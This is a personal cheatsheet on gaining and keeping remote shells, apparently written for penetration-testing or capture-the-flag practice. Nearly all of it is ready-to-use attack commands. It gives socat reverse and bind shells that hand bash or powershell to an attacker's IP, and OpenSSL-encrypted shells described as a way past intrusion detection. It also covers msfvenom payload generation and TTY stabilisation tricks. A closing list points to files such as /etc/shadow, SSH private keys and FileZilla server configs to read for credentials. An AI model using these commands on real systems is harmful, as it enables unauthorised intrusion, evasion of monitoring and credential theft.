Shell101
My Cheatsheet about Shells
The two kind of shells
Reverse Shells
Target executes code that connects back to the attacking machine. The attacking machine must have a listener running (e.g. netcat).
Reverse Shells are more likely to get around a Firewall than Bind Shells.
Bind Shells
Code gets executed on the target in order to start a listener on that machine. The attacking machine than connects to the target machhine.
Shell Stabilisation
Technique 1
0python3 -c "import pty;pty.spawn('/bin/bash')"
1
2python -c "import pty;pty.spawn('/bin/bash')"
depending on whether Python 2.x or 3.x is installed on the system.
export TERM=xterm
(enables commands like clear
).
Background the Shell using CTRL+Z and type in: stty raw -echo; fg
That gives access to the tab complete fucntion, the arrow keys and CTRL+C will stop a program on the target machine instead of killing the shell.
(In case the shell dies you have to type reset
as echo is turned of locally)
Technique 2
Instead of starting a listener with nc -lvnp <PORT>
, start it with rlwrap nc -lvnp <PORT>
.
rlwrap isn't installed by default on most distros (including Kali or Parrot).
This provides the functionality of tab complete and the arrow keys; in order to enable CTRL+C for the target machine check Technique 1.
Technique 3
This is more an alternative than a technique. Instead of using netcat or combining netcat with rlwrap it is also possible to use a completely different software: socat.
Socat is especially useful for Linux Shells as it makes them much more stable (not really on Windows).
Just like rlwrap this often does not come pre-installed with an operating system and you have to be able to execute socat on both machines.
TTY Shells
/bin/bash can also be replaced with other shells like /bin/sh
0python -c "import pty;pty.spawn('/bin/bash')"
1python3 -c "import pty;pty.spawn('/bin/bash')"
0echo os.system('/bin/bash')
1
2/bin/bash -i
0perl -e 'exec "/bin/bash";'
1perl: exec "/bin/bash";
0ruby exec "/bin/bash"
0lua: os.execute("/bin/bash")
Inside vi(m):
:!/bin/bash
: set shell=/bin/bash:shell
Inside nmap interactive mode:
!bash
Misc
You can use stty rows <num>
and stty cols <num>
to adjust the registered width and height. This can be useful for using software like text editors.
Socat
Socat Reverse Shell
On your local machine start a listener with: socat TCP-L:<PORT> -
On the attacked machine use the following command to connect back:
- Linux:
socat TCP:<IP>:<PORT> EXEC:"bash -li"
- Linux (more stable):
socat TCP:<IP>:<PORT> EXEC:"bash -li",pty,stderr,sigint,setsid,sane
- pty: allocates an pseudo terminal => makes it more stable
- stderr: makes sure all error messages get shown
- sigint: enables CTRL+C
- setsid: creates the process in a new session
- sane: stabilises the shell
- If possible use that command instead of the other Linux command above
- Windows:
socat TCP:<IP>:<PORT> EXEC:powershell.exe,pipes
Socat Bind Shell
On the attacked machine use the following command to start a listener:
- Linux:
socat TCP-L:<PORT> EXEC:"bash -li"
- Windows:
socat TCP-L:<PORT> EXEC:powershell.exe,pipes
On the attacking machine use the following command to connect: socat TCP:<IP>:<PORT> -
Socat File Transfer
Machine that's providing the file: socat TCP-L:443,fork file:<FILENAME>
- fork creates a child process once a connection is established
Machine retrieving the file: socat TCP:<IP>:<PORT> file:<OUTPUT_NAME>,create
Socat Encrypted Shell
Encrypted shells are usefull as they are able to bypass an Intrusion Detection System (short: IDS).
The "TCP" keyword gets replaced with "OPENSSL".
- Generate a certificate that is used for the encryption:
openssl req -newkey rsa:2048 -nodes -keyout shell.key -x509 -days 300 -out shell.crt
- Merge the two files (shell.key & shell.crt):
cat shell.key shell.crt > shell.pem
Reverse Shell
- Set up a listener (Attacking machine):
socat OPENSSL-LISTEN:<PORT>,cert=shell.pem,verify=0 -
verify=0
is used so that the certificate does not get validated
- Connect back (Target machine):
socat OPENSSL:<IP>:<PORT>,verify=0 EXEC:"/bin/bash"
, add,pty,stderr,sigint,setsid,sane
to make the shell more stable
Bind Shell
In order to get a Bind Shell it is necessary that the certificate (the pem file) got transfered onto the target machine first.
- Set up a listener (Target machine):
socat OPENSSL-LISTEN:<PORT>,cert=shell.pem,verify=0 EXEC:"/bin/bash"
, add,pty,stderr,sigint,setsid,sane
to make it more stable. - Connect back (Attacking machine):
socat OPENSSL:<IP>:<PORT>,verify=0 -
msfvenom
msfvenom is part of the metasploit framework and is able to generate code for bind and reverse shells. It can generate payloads in various formags like .exe, .asp, .aspx, .war, .py, .php, and so on.
Standard syntax: msfvenom -p <PAYLOAD> <OPTIONS>
The most important options are:
LHOST=
to set your local IPLPORT=
to choose the port
Other useful options are:
-f <FORMAT>
tp specify the file format-o <OUTFILE>
to specify the output file / location
The <PAYLOAD> can be devided into the following parts: <OS>/<ARCH>/<PAYLOAD>
, e.g. linux/x86/shell_reverse_tcp
.
Windows 32bit is an exception, there it is only: windows/shell_reverse_tcp
and not windows/x86/shell_reverse_tcp
.
All payloads can be listed with: msfvenom --list payloads
If the payload is denoted with an underscore (_
) it is a stageless one. (Staged equivalent: shell/reverse_tcp
, these are denoted with a slash (/
))
Anoter example:
- Stageless:
windows/x64/meterpreter_reverse_tcp
- Staged:
windows/x64/meterpreter/reverse_tcp
What are staged and stageless payloads after all?
Staged
Payloads are sent in multiple parts, the stager and the actual payload. The stager gets sent first and then downloads the actual (bigger) payload and executes it.
These payloads often require the multi/handler of metasploit.
Stageless
These are the common payloads though they are easier to detect. Compared to staged payloads these get sent in one part and executed fully right away.
Places to look after you got a shell
Shells are always less stable than a SSH session, if possible try to switch to that e.g. by finding private keys.
Linux
- /home/user/.ssh
- /etc/shadow
- /etc/passwd
Windows
- C:\Program Files\FileZilla Server\FileZilla Server.xml
- C:\xampp\FileZilla Server\FileZilla Server.xml
Additional Information
You can find a Reverse Shell Cheatsheet on my GitHub repository: here as well as some useful binaries without dependencies.